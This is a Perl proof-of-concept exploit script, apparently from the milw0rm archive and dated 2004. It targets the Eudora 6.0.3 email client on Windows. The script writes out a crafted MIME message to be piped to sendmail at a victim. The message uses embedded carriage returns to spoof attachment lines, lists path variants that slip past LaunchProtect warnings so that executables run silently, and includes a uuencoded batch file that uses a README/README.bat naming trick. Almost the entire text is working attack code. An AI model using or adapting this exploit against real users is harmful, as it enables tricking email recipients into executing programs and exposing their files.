#!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtect\n"; print "MIME-Version: 1.0\n"; print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; print "\n"; print "This is a multi-part message in MIME format.\n"; print "--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print "\nWith spoofed attachments, we could 'steal' files if the message was forwarded (not replied to).\n"; print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded CR=x0d characters get converted internally into a NUL=x00 and ignored, so we can spoof \"attachment converted\" lines:\n"; print "\nThe following work fine (but are boring and/or put up warnings):\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n"; print "(Note how JavaScript is done with IE, web with default browser Netscape)\n"; print "Attachment Converted\r: hello.txt\n"; print "Attachment Converted\r: web.txt\n"; print "Attachment Converted\r: file.txt\n"; print "\nIf we can guess the full path to the attach directory then can change the name shown to anything we like, but get broken icon:\n"; print "Attachment Converted\r: file.txt\n"; print "\nCuteness value only:\n"; print "Attachment Converted\r: file1.txt xyz file2.txt\n"; print "\n With HTML inclusions we can do file, http and javascript references. Any way to exploit this? \n"; print "\n Can also do RTF inclusions. Can this be abused? \n"; print "\nThose constructs allow spoofing attachments easily, without embedded CR:\n\n"; print "HTML\n"; print "Attachment Converted: \"xyz\"\n"; print "Rich\n"; print "Attachment Converted: \"xyz\"\n"; print "Flowed\n"; print "Attachment Converted: \"xyz\"\n"; print "\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"plain.txt\"\n"; print "Content-Transfer-Encoding: 7bit\n"; print "Content-Disposition: inline; filename=\"plain.txt\"\n"; print "\n"; print "Within a 'plain' attachment:\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"qp.txt\"\n"; print "Content-Transfer-Encoding: quoted-printable \n"; print "Content-Disposition: inline; filename=\"qp.txt\"\n"; print "\n"; print "Within quoted-printable encoded parts still need the embedded CR:\n"; print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r without embedded CR (but line termination is CR-NL):\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n"; print encode_base64($z); print "\n--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "\n=====\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or) after some blurb so is scrolled off in another screenful, also send $Y. Clicking on $X does not get it any more (but gets $Y, with a LauchProtect warning):\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; print "\n=====\n"; print " Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: go.txt\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; print " Can be exploited if there is more than one way into attach: in my setup H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n"; print "These elicit warnings:\n"; print "Attachment Converted\r: readme.txt\n"; print "Attachment Converted\r: h:/eudora/attach/README\n"; print "Attachment Converted\r: \\README\n"; print "Attachment Converted\r: .\\README\n"; print "Attachment Converted\r: \\.\\README\n"; print "Attachment Converted\r: ?\\README\n"; print "Attachment Converted\r: \\?\\README\n"; print "while these do the bad thing without warning:\n"; print "Attachment Converted\r: readme\n"; print "Attachment Converted\r: //rome/home/eudora/attach/README\n"; print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n"; print " For the default setup, Eudora knows that C:\\Program Files and C:\\Progra~1 are the same thing:\n"; print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n"; print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n"; print " and also knows that various UNC references: \\\\localhost\\c... \\\\127.0.0.1\\c... \\\\BIOSNAME\\c... \\\\DNSNAME\\c... \\\\IP\\c... \\\\\\?\\c... \\\\c... ...c:\\progr... ...c\\progr... ...c:progr... ...program files\\... ...progra~1\\... or even .\\NoSuchDir\\..\\README //c|\\Program Files\\qualcomm\\eudora\\attach\\README \\\\c|\\Program Files\\qualcomm\\eudora\\attach\\README res://c:\\Program Files\\qualcomm\\eudora\\attach\\README res:\\\\c:\\Program Files\\qualcomm\\eudora\\attach\\README shell:Fonts\\..\\..\\Program Files\\qualcomm\\eudora\\attach\\README %ProgramFiles%\\qualcomm\\eudora\\attach\\README %windir%\\..\\Program Files\\qualcomm\\eudora\\attach\\README are all the same thing... "; print "\n"; print "\n--zzz--\n"; print "\n"; # milw0rm.com [2004-03-19]